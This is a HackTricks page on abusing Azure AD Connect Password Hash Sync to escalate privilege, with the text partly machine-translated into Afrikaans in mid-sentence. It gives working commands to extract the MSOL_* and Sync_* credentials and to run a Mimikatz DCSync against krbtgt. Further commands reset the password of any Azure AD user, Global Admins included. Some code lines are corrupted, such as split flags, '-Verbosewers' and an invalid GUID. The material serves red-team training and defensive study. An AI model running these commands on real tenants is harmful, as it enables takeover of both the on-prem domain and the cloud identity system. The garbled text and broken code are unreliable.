Az - PHS - Password Hash Sync

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

From the docs: Wagwoord-hash-sinkronisering is one of the sign-in methods used to accomplish hybrid identity. Azure AD Connect sinkroniseer 'n hash, van die hash, van 'n gebruiker se wagwoord van 'n plaaslike Active Directory-instansie na 'n wolk-gebaseerde Azure AD-instansie.

It's the meest algemene metode used by companies to synchronize an on-prem AD with Azure AD.

All gebruikers and a hash van die wagwoord hashes are synchronized from the on-prem to Azure AD. However, duidelike teks wagwoorde or the oorspronklike hashes aren't sent to Azure AD. Moreover, Ingeboude security groups (like domain admins...) are nie gesinkroniseer to Azure AD.

The hashes sinkronisering occurs every 2 minute. However, by default, wagwoord vervaldatum and rekening verval are nie gesinkroniseer in Azure AD. So, a user whose on-prem wagwoord is verval (not changed) can continue to toegang Azure hulpbronne using the old password.

When an on-prem user wants to access an Azure resource, the authentisering vind plaas op Azure AD.

PHS is required for features like Identiteitsbeskerming and AAD Domain Services.

Pivoting

When PHS is configured some bevoorregte rekeninge are automatically gecreëer:

The account MSOL_<installationID> is automatically created in on-prem AD. This account is given a Directory Synchronization Accounts role (see documentation) which means that it has replication (DCSync) permissions in the on-prem AD.
An account Sync_<name of on-prem ADConnect Server>_installationID is created in Azure AD. This account can reset password of ANY user (synced or cloud only) in Azure AD.

Passwords of the two previous privileged accounts are stored in a SQL server on the server where Azure AD Connect is installed. Admins can extract the passwords of those privileged users in clear-text. The database is located in C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf.

It's possible to extract the configuration from one of the tables, being one encrypted:

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

The encrypted configuration is encrypted with DPAPI and it contains the wagwoorde van die MSOL_* user in on-prem AD and the password of Sync_* in AzureAD. Therefore, compromising these it's possible to privesc to the AD and to AzureAD.

You can find a full overview of how these credentials are stored and decrypted in this talk.

Finding the Azure AD connect server

If the server where Azure AD connect is installed is domain joined (recommended in the docs), it's possible to find it with:

# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl

#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

Misbruik van MSOL_*

# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

Jy kan ook adconnectdump gebruik om hierdie akrediteer te verkry.

Misbruik van Sync_*

Deur die Sync_* rekening te kompromitteer, is dit moontlik om die wagwoord van enige gebruiker (insluitend Globale Administrators) te herstel.

# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

Dit is ook moontlik om slegs die wagwoorde van wolk gebruikers te wysig (selfs al is dit onverwags)

# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

Dit is ook moontlik om die wagwoord van hierdie gebruiker te dump.

'n Ander opsie sou wees om bevoorregte toestemmings aan 'n dienshoof toe te ken, wat die Sync gebruiker toestemmings het om te doen, en dan daardie dienshoof te benader as 'n manier van privesc.

Naadlose SSO

Dit is moontlik om Naadlose SSO met PHS te gebruik, wat kwesbaar is vir ander misbruik. Kontroleer dit in:

Az - Seamless SSO

Verwysings

Ondersteun HackTricks

Kontroleer die subskripsieplanne!
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PR's in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousAz - Federation NextAz - PTA - Pass-through Authentication

Last updated 3 days ago